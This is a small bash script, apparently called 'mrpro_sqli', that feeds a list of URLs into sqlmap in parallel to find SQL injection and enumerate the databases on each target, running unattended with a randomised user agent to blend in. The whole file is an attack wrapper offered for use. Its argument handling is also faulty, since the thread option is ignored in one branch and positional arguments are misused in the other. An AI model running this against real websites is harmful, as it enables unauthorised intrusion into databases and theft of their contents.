#!/bin/bash

while getopts f:t: flag
do
    case "${flag}" in
        f) filename=${OPTARG};;
        t) threads=${OPTARG};;
    esac
done
if [[ $# == 0 ]]; then
        echo "mrpro_sqli -f {file_name} -t {threads}"
elif [[ ! $filename == "" ]]; then
        if [ -f "$filename" ]; then
                cat $filename | parallel -j 5 sqlmap -u {} --dbs --batch --output-dir=./sqlmap --random-agent
        else
                echo "$filename does not exist."
        fi
elif [[ ! $threads == "" ]]; then
        if [ -f "$1" ]; then
                cat $1 | parallel -j $2 sqlmap -u {} --dbs --batch --output-dir=./sqlmap --random-agent
        else
                echo "$filename does not exist."
                echo "mrpro_sqli {file_name} {threads}"
        fi
else
        echo "mrpro_sqli -f {file_name} -t {threads}"
fi
